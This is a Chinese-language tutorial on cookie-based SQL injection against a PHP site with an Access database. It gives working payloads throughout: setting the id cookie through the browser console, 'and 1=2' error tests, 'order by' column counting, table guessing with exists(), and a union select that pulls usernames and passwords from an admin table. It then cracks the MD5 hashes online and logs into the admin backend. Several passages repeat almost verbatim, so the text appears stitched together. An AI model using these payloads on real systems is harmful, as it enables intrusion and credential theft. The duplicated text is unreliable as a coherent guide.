++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
这里顺便在说下原理。传参后要刷新,才可以看到你的新的页面,不然执行了,没刷新,一样看不到新的页面。
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
这里我们使用cookie来传参的,注意php5.4以上的版本就不会接受cookie传参了
下面我们就在本地服务器来试一试
先写一个php传参文件,
REQUEST可以接受POST,GET,COOKIE传参
然后进行传参,可发现,传参成功。
那么接下来我们就来使用cookie传参
按下键盘上的“F12”按钮,进入浏览器控制台,
找到application》然后找到cookie》在选中你要用的页面
name的名字改成传参的,value改成你要传参的值,然后回车就看到cookie传参成功了。
这个时候我们把cookie的值改为171 and 1=2 但是直接在F12里的话必须是url编码才行,所以我们先去转一下码》》得到就结果就是171+and+1%3d2
, 则页面显示错误
url代码:171+union+select+1%2c2%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10+from+admin
一般从数据库里获取的数据是经过加密的,而且一般是MD5方式加密。
但是我们国内已经把这个加密方式给破解出来,
并公布了破解算法了,所以随便找个,在线解密MD5值的网站进行解密。
从而通过后台登录页面进入后台
按下"F12"打开控制台。在console里输入传参建和传参值。
document.cookie="id="+escape("170")
然后就立马挑战到新的页面了,而我们也没看到之前的get传参了,说明cookie传参成功。
然后我们就来进行cookie注入。
判断字段数
document.cookie="id="+escape("170 order by 10")
document.cookie="id="+escape("170 and exists(select*from a)")
既然知道了表名,那么现在正式来判断回显点。
document.cookie="id="+escape("170 union select 1,2,3,4,5,6,7,8,9,10 from admin")
判断字段名
既然access没有自带库,那么我们就只有强猜字段了,
根据表的名称,我们知道是admin,那字段名回不回是用户名和密码呢,(英文)
也就是username和passwod ,我们可以试一下。
document.cookie="id="+escape("170 union select 1,2,3,4,5,6,username,password,9,10 from admin ")
一般从数据库里获取的数据是经过加密的,而且一般是MD5方式加密。
但是我们国内已经把这个加密方式给破解出来,
并公布了破解算法了,所以随便找个,在线解密MD5值的网站进行解密。
从而通过后台登录页面进入后台
这个时候我们把cookie的值改为171 and 1=2 但是直接在cookie里的话必须是url编码才行,所以我们先去转一下码》》得到就结果就是171+and+1%3d2
, 则页面显示错误
判断字段数
170+order+by+10
判断回显点
在判断回显点的时候,先要猜表名,原理如下图。
我们先来用这个函数猜猜表名
170 and exists(select*from a)
既然知道了表名,那么现在正式来判断回显点。
170 union select 1,2,3,4,5,6,7,8,9,10 from admin
判断字段名
既然access没有自带库,那么我们就只有强猜字段了,
根据表的名称,我们知道是admin,那字段名回不回是用户名和密码呢,(英文)
也就是username和passwod ,我们可以试一下。
170 union select 1,2,3,4,5,6,username,password,9,10 from admin
一般从数据库里获取的数据是经过加密的,而且一般是MD5方式加密。
但是我们国内已经把这个加密方式给破解出来,
并公布了破解算法了,所以随便找个,在线解密MD5值的网站进行解密。
从而通过后台登录页面进入后台